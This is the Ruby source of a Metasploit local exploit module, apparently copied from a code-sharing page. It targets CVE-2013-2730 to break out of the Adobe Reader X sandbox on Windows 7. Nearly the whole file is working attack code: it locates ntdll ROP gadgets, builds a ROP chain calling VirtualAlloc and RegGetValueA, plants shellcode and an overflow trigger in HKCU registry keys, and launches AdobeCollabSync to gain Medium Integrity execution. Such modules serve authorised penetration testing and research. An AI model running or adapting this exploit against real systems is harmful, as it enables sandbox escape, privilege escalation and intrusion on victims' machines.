Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::EXE
10
  include Msf::Post::File
11
  include Msf::Post::Windows::Registry
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        {
18
          'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',
19
          'Description' => %q{
20
            This module exploits a vulnerability on Adobe Reader X Sandbox. The
21
            vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe
22
            process to write register values which can be used to trigger a buffer overflow on
23
            the AdobeCollabSync component, allowing to achieve Medium Integrity Level
24
            privileges from a Low Integrity AcroRd32.exe process. This module has been tested
25
            successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.
26
          },
27
          'License' => MSF_LICENSE,
28
          'Author' => [
29
            'Felipe Andres Manzano', # Vulnerability discovery and PoC
30
            'juan vazquez' # Metasploit module
31
          ],
32
          'References' => [
33
            [ 'CVE', '2013-2730' ],
34
            [ 'OSVDB', '93355' ],
35
            [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]
36
          ],
37
          'Arch' => ARCH_X86,
38
          'Platform' => 'win',
39
          'SessionTypes' => ['meterpreter'],
40
          'Payload' => {
41
            'Space' => 12288,
42
            'DisableNops' => true
43
          },
44
          'Targets' => [
45
            [
46
              'Adobe Reader X 10.1.4 / Windows 7 SP1',
47
              {
48
                'AdobeCollabSyncTrigger' => 0x18fa0,
49
                'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF"
50
              }
51
            ],
52
          ],
53
          'DefaultTarget' => 0,
54
          'DisclosureDate' => '2013-05-14',
55
          'Compat' => {
56
            'Meterpreter' => {
57
              'Commands' => %w[
58
                stdapi_railgun_api
59
                stdapi_railgun_memread
60
                stdapi_sys_config_getenv
61
              ]
62
            }
63
          }
64
        }
65
      )
66
    )
67

68
    self.needs_cleanup = true
69
  end
70

71
  def on_new_session
72
    print_status("Deleting Malicious Registry Keys...")
73
    if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
74
      print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself")
75
    end
76
    if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
77
      print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself")
78
    end
79
    print_status("Cleanup finished")
80
  end
81

82
  # Test the process integrity level by trying to create a directory on the TEMP folder
83
  # Access should be granted with Medium Integrity Level
84
  # Access should be denied with Low Integrity Level
85
  # Usint this solution atm because I'm experiencing problems with railgun when trying
86
  # use GetTokenInformation
87
  def low_integrity_level?
88
    tmp_dir = session.sys.config.getenv('TEMP')
89
    cd(tmp_dir)
90
    new_dir = "#{rand_text_alpha(5)}"
91
    begin
92
      session.shell_command_token("mkdir #{new_dir}")
93
    rescue
94
      return true
95
    end
96

97
    if directory?(new_dir)
98
      session.shell_command_token("rmdir #{new_dir}")
99
      return false
100
    else
101
      return true
102
    end
103
  end
104

105
  def check_trigger
106
    signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)
107
    if signature == target['AdobeCollabSyncTriggerSignature']
108
      return true
109
    end
110

111
    return false
112
  end
113

114
  def collect_addresses
115
    # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe
116
    @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']
117
    vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}")
118

119
    # find kernel32.dll
120
    kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll")
121
    @addresses['kernel32.dll'] = kernel32["return"]
122
    if @addresses['kernel32.dll'] == 0
123
      fail_with(Failure::Unknown, "Unable to find kernel32.dll")
124
    end
125
    vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}")
126

127
    # find kernel32.dll methods
128
    virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc")
129
    @addresses['VirtualAlloc'] = virtual_alloc["return"]
130
    if @addresses['VirtualAlloc'] == 0
131
      fail_with(Failure::Unknown, "Unable to find VirtualAlloc")
132
    end
133
    vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}")
134

135
    reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA")
136
    @addresses['RegGetValueA'] = reg_get_value["return"]
137
    if @addresses['RegGetValueA'] == 0
138
      fail_with(Failure::Unknown, "Unable to find RegGetValueA")
139
    end
140
    vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}")
141

142
    # find ntdll.dll
143
    ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll")
144
    @addresses['ntdll.dll'] = ntdll["return"]
145
    if @addresses['ntdll.dll'] == 0
146
      fail_with(Failure::Unknown, "Unable to find ntdll.dll")
147
    end
148
    vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}")
149
  end
150

151
  # Search a gadget identified by pattern on the process memory
152
  def search_gadget(base, offset_start, offset_end, pattern)
153
    mem = base + offset_start
154
    length = offset_end - offset_start
155
    mem_contents = session.railgun.memread(mem, length)
156
    return mem_contents.index(pattern)
157
  end
158

159
  # Search for gadgets on ntdll.dll
160
  def search_gadgets
161
    ntdll_text_base = 0x10000
162
    search_length = 0xd6000
163

164
    @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3")
165
    if @gadgets['mov [edi], ecx # ret'].nil?
166
      fail_with(Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'")
167
    end
168
    @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']
169
    @gadgets['mov [edi], ecx # ret'] += ntdll_text_base
170
    vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}")
171

172
    @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2
173
    vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}")
174

175
    @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3")
176
    if @gadgets['pop edi # ret'].nil?
177
      fail_with(Failure::Unknown, "Unable to find gadget 'pop edi # ret'")
178
    end
179
    @gadgets['pop edi # ret'] += @addresses['ntdll.dll']
180
    @gadgets['pop edi # ret'] += ntdll_text_base
181
    vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}")
182

183
    @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3")
184
    if @gadgets['pop ecx # ret'].nil?
185
      fail_with(Failure::Unknown, "Unable to find gadget 'pop ecx # ret'")
186
    end
187
    @gadgets['pop ecx # ret'] += @addresses['ntdll.dll']
188
    @gadgets['pop ecx # ret'] += ntdll_text_base
189
    vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")
190
  end
191

192
  def store(buf, data, address)
193
    i = 0
194
    while (i < data.length)
195
      buf << [@gadgets['pop edi # ret']].pack("V")
196
      buf << [address + i].pack("V") # edi
197
      buf << [@gadgets['pop ecx # ret']].pack("V")
198
      buf << data[i, 4].ljust(4, "\x00") # ecx
199
      buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
200
      i = i + 4
201
    end
202
    return i
203
  end
204

205
  def create_rop_chain
206
    mem = 0x0c0c0c0c
207

208
    buf = [0x58000000 + 1].pack("V")
209
    buf << [0x58000000 + 2].pack("V")
210
    buf << [0].pack("V")
211
    buf << [0x58000000 + 4].pack("V")
212

213
    buf << [0x58000000 + 5].pack("V")
214
    buf << [0x58000000 + 6].pack("V")
215
    buf << [0x58000000 + 7].pack("V")
216
    buf << [@gadgets['ret']].pack("V")
217
    buf << rand_text(8)
218

219
    # Allocate Memory To store the shellcode and the necessary data to read the
220
    # shellcode stored in the registry
221
    buf << [@addresses['VirtualAlloc']].pack("V")
222
    buf << [@gadgets['ret']].pack("V")
223
    buf << [mem].pack("V")        # lpAddress
224
    buf << [0x00010000].pack("V") # SIZE_T dwSize
225
    buf << [0x00003000].pack("V") # DWORD flAllocationType
226
    buf << [0x00000040].pack("V") # flProtect
227

228
    # Put in the allocated memory the necessary data in order to read the
229
    # shellcode stored in the registry
230
    # 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
231
    reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00"
232
    reg_key_length = store(buf, reg_key, mem)
233
    # 2) The reg entry: shellcode
234
    value_key = "shellcode\x00"
235
    store(buf, value_key, mem + reg_key_length)
236
    # 3) The output buffer size: 0x3000
237
    size_buffer = 0x3000
238
    buf << [@gadgets['pop edi # ret']].pack("V")
239
    buf << [mem + 0x50].pack("V") # edi
240
    buf << [@gadgets['pop ecx # ret']].pack("V")
241
    buf << [size_buffer].pack("V") # ecx
242
    buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
243

244
    # Copy the shellcode from the registry to the
245
    # memory allocated with executable permissions and
246
    # ret into there
247
    buf << [@addresses['RegGetValueA']].pack("V")
248
    buf << [mem + 0x1000].pack("V") # ret to shellcode
249
    buf << [0x80000001].pack("V")   # hkey => HKEY_CURRENT_USER
250
    buf << [mem].pack("V")          # lpSubKey
251
    buf << [mem + 0x3c].pack("V")   # lpValue
252
    buf << [0x0000FFFF].pack("V")   # dwFlags => RRF_RT_ANY
253
    buf << [0].pack("V")            # pdwType
254
    buf << [mem + 0x1000].pack("V") # pvData
255
    buf << [mem + 0x50].pack("V")   # pcbData
256
  end
257

258
  # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry
259
  def store_data_registry(buf)
260
    vprint_status("Creating the Registry Key to store the shellcode...")
261

262
    if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
263
      vprint_good("Registry Key created")
264
    else
265
      fail_with(Failure::Unknown, "Failed to create the Registry Key to store the shellcode")
266
    end
267

268
    vprint_status("Storing the shellcode in the Registry...")
269

270
    if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY")
271
      vprint_good("Shellcode stored")
272
    else
273
      fail_with(Failure::Unknown, "Failed to store shellcode in the Registry")
274
    end
275

276
    # Create the Malicious registry entry in order to exploit....
277
    vprint_status("Creating the Registry Key to trigger the Overflow...")
278
    if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
279
      vprint_good("Registry Key created")
280
    else
281
      fail_with(Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow")
282
    end
283

284
    vprint_status("Storing the trigger in the Registry...")
285
    if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY")
286
      vprint_good("Trigger stored")
287
    else
288
      fail_with(Failure::Unknown, "Failed to store the trigger in the Registry")
289
    end
290
  end
291

292
  def trigger_overflow
293
    vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...")
294
    # Create a thread in order to execute the necessary code to launch AdobeCollabSync
295
    ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil)
296
    if ret['return'] < 1
297
      print_error("Unable to CreateThread")
298
      return
299
    end
300
    hthread = ret['return']
301

302
    vprint_status("Resuming the Thread...")
303
    # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!
304
    ret = client.railgun.kernel32.ResumeThread(hthread)
305
    if ret['return'] < 1
306
      fail_with(Failure::Unknown, "Unable to ResumeThread")
307
    end
308
  end
309

310
  def check
311
    @addresses = {}
312
    acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
313
    @addresses['AcroRd32.exe'] = acrord32["return"]
314
    if @addresses['AcroRd32.exe'] == 0
315
      return Msf::Exploit::CheckCode::Unknown
316
    elsif check_trigger
317
      return Msf::Exploit::CheckCode::Vulnerable
318
    else
319
      return Msf::Exploit::CheckCode::Detected
320
    end
321
  end
322

323
  def exploit
324
    @addresses = {}
325
    @gadgets = {}
326

327
    print_status("Verifying we're in the correct target process...")
328
    acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
329
    @addresses['AcroRd32.exe'] = acrord32["return"]
330
    if @addresses['AcroRd32.exe'] == 0
331
      fail_with(Failure::NoTarget, "AcroRd32.exe process not found")
332
    end
333
    vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}")
334

335
    print_status("Checking the AcroRd32.exe image...")
336
    if not check_trigger
337
      fail_with(Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target")
338
    end
339

340
    print_status("Checking the Process Integrity Level...")
341
    if not low_integrity_level?
342
      fail_with(Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level")
343
    end
344

345
    print_status("Collecting necessary addresses for exploit...")
346
    collect_addresses
347

348
    print_status("Searching the gadgets needed to build the ROP chain...")
349
    search_gadgets
350
    print_good("Gadgets collected...")
351

352
    print_status("Building the ROP chain...")
353
    buf = create_rop_chain
354
    print_good("ROP chain ready...")
355

356
    print_status("Storing the shellcode and the trigger in the Registry...")
357
    store_data_registry(buf)
358

359
    print_status("Executing AdobeCollabSync.exe...")
360
    trigger_overflow
361
  end
362
end
363

364